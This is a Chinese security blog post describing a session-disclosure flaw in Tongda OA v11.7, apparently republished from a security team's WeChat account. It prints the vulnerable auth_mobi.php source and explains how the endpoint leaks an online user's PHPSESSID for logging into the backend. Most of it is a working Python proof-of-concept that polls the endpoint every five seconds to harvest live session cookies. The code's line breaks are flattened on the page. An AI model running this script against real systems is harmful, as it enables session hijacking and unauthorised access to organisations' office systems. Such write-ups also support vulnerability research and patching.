通达OA v11.7 在线用户登录漏洞

admin 2021年6月11日11:24:33评论86 views字数 2710阅读9分2秒阅读模式

点击蓝字

通达OA v11.7 在线用户登录漏洞

关注我们



声明

本文作者:PeiQi
本文字数:1338

阅读时长:15min

附件/链接:点击查看原文下载

声明:请勿用作违法用途,否则后果自负

本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载




前言



一、

漏洞描述

通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统


二、

漏洞影响

通达OA < v11.7


三、

漏洞复现

通达OA v11.7下载链接(回复通达OA11.7下载)

下载后按步骤安装即可

漏洞有关文件 MYOAwebrootmobileauth_mobi.php

<?php
function relogin(){ echo _('RELOGIN'); exit;}ob_start();include_once 'inc/session.php';include_once 'inc/conn.php';include_once 'inc/utility.php';if ($isAvatar == '1' && $uid != '' && $P_VER != '') { $sql = 'SELECT SID FROM user_online WHERE UID = '' . $uid . '' and CLIENT = '' . $P_VER . '''; $cursor = exequery(TD::conn(), $sql); if ($row = mysql_fetch_array($cursor)) { $P = $row['SID']; }}if ($P == '') { $P = $_COOKIE['PHPSESSID']; if ($P == '') { relogin(); exit; }}if (preg_match('/[^a-z0-9;]+/i', $P)) { echo _('非法参数'); exit;}if (strpos($P, ';') !== false) { $MY_ARRAY = explode(';', $P); $P = trim($MY_ARRAY[1]);}session_id($P);session_start();session_write_close();if ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') { relogin();}

在执行的 SQL语句中

$sql = 'SELECT SID FROM user_online WHERE UID = '' . $uid . '' and CLIENT = '' . $P_VER . ''';


通达OA v11.7 在线用户登录漏洞

简单阅读PHP源码可以知道 此SQL语句会查询用户是否在线,如在线返回此用户 Session ID

通达OA v11.7 在线用户登录漏洞

将返回的 Set-Cookie 中的Cookie参数值使用于登录Cookie

访问目标后台 http://xxx.xxx.xxx.xxx/general/

通达OA v11.7 在线用户登录漏洞

当目标离线时则访问漏洞页面则会出现如下图

通达OA v11.7 在线用户登录漏洞

5秒一次测试用户是否在线

通过此思路可以持续发包监控此页面来获取在线用户的Cookie


四、

Payload


import requestsimport sysimport randomimport reimport timefrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():    print('+------------------------------------------')    print('+  33[34mPOC_Des: http://wiki.peiqi.tech                                   33[0m')    print('+  33[34mVersion: 通达OA 11.7                                               33[0m')    print('+  33[36m使用格式:  python3 poc.py                                            33[0m')    print('+  33[36mUrl         >>> http://xxx.xxx.xxx.xxx                             33[0m')    print('+------------------------------------------')def POC_1(target_url):    vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",    }try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)if "RELOGIN" in response.text and response.status_code == 200:            print("33[31m[x] 目标用户为下线状态 --- {}33[0m".format(time.asctime( time.localtime(time.time()))))elif response.status_code == 200 and response.text == "":            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(response.headers))            print("33[32m[o] 用户上线 PHPSESSION: {} --- {}33[0m".format(PHPSESSION[0] ,time.asctime(time.localtime(time.time()))))else:            print("33[31m[x] 请求失败,目标可能不存在漏洞")            sys.exit(0)except Exception as e:        print("33[31m[x] 请求失败 33[0m", e)if __name__ == '__main__':    title()    target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))while True:        POC_1(target_url)        time.sleep(5)

效果


通达OA v11.7 在线用户登录漏洞


团队【PeiQi】师傅的微信二维码放在这了


通达OA v11.7 在线用户登录漏洞




扫描关注公众号回复加群

和师傅们一起讨论研究~


WgpSec狼组安全团队

微信号:wgpsec

Twitter:@wgpsec


通达OA v11.7 在线用户登录漏洞
通达OA v11.7 在线用户登录漏洞


本文始发于微信公众号(WgpSec狼组安全团队):通达OA v11.7 在线用户登录漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月11日11:24:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通达OA v11.7 在线用户登录漏洞https://cn-sec.com/archives/278979.html

发表评论

匿名网友 填写信息